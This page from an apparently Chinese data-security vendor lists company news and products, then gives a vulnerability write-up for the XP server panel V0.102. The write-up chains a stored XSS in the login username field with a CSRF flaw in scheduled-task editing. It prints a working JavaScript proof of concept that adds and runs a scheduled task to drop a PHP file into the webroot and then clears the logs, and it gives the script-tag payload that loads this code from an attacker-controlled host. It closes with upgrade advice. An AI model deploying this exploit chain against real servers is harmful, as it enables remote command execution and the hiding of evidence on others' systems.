四年同行,韌性共鑄:西南某商行攜手美創科技再度通過年度容災大考
2025-12-26
以“AI+數據安全”領雁!祝賀美創牽頭項目入選浙江省科技廳“尖兵領雁”計劃 !
2025-12-22
美創AI災備專家:引領災備領域邁入“智能化”時代
2025-12-15
熱點觀察|美創科技丁斐:數據安全 × 價值共創?可信數據空間的 “雙向奔赴”
2025-12-03
美創科技高校供應鏈數據安全方案斬獲 2025 年度 “金智獎”
2025-12-03
存儲域
數據庫加密 諾亞防勒索訪問域
數據庫防水壩 數據庫防火墻 數據庫安全審計 動態脫敏流動域
靜態脫敏 數據水印 API審計 API防控 醫療防統方運維服務
數據庫運維服務 中間件運維服務 國產信創改造服務 駐場運維服務 供數服務安全咨詢服務
數據出境安全治理服務 數據安全能力評估認證服務 數據安全風險評估服務 數據安全治理咨詢服務 數據分類分級咨詢服務 個人信息風險評估服務 數據安全檢查服務小皮面板集安全、高效、功能于一體。支持一鍵LAMP、LNMP、集群、監控、網站、數據庫、FTP、軟件中心、偽靜態、云備份、SSL、多版本共存、Nginx反向代理、服務器防火墻、web防火墻、監控大屏等100多項服務器管理功能。小皮面板登錄接口的username參數值存在存儲性XSS漏洞,可通過該存儲性XSS漏洞將計劃任務寫入小皮面板服務器,從而達到命令執行效果。
V0.102
訪問
https://www.xp.cn/windows-panel.html
點擊立即下載
下載完成后運行安裝程序進行安裝
安裝完成后,桌面生成”小皮面板初始信息.txt”,文本文件中包含面板地址、面板賬號密碼
訪問面板地址
http://:9080/8D92C9
出現以下界面代表安裝成功
如圖所示,在登錄界面用戶名欄輸入payload:<script>alert(1)</script>,密碼欄輸入任意,驗證碼欄輸入正確的驗證碼,輸入完畢后點擊登錄
再次將用戶名、密碼、驗證碼欄處輸入正確的用戶名、密碼以及驗證碼
登錄系統后,將觸發xss漏洞
漏洞起因是由于操作日志中記錄了登錄失敗的用戶名,且輸出用戶名時未進行html編碼
小皮面板后臺可以編輯服務器的計劃任務,且編輯計劃任務處未校驗csrf token與referer,所以編輯計劃任務處存在csrf漏洞,可利用存儲性XSS與csrf漏洞添加計劃任務以達到命令執行效果。
構造如下JS文件,JS文件內容為發送創建計劃任務請求
function poc(){ $.get('/service/app/tasks.php?type=task_list',{},function(data){ var id=data.data[0].ID; $.post('/service/app/tasks.php?type=exec_task',{ tid:id },function(res2){ $.post('/service/app/log.php?type=clearlog',{ },function(res3){},"json"); },"json"); },"json");}function save(){ var data=new Object(); data.task_id=""; data.title="test"; data.exec_cycle="1"; data.week="1"; data.day="3"; data.hour="12"; data.minute = "00"; data.shell='echo "<?php phpinfo();?>" >C:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php'; $.post('/service/app/tasks.php?type=save_shell',data,function(res){ poc(); },'json');}save();
將該JS文件放置在小皮面板能夠訪問到的web應用中
在小皮面板的登錄界面構造xss payload
<script src=”http://ip:port/test.js”></script>
輸入任意密碼與正確的驗證碼,點擊登錄
使用正確的賬號密碼登錄小皮面板
如圖所示,計劃任務列表中新的計劃任務被添加
訪問
http://ip/1.php
出現phpinfo函數界面
將小皮面板版本升至最新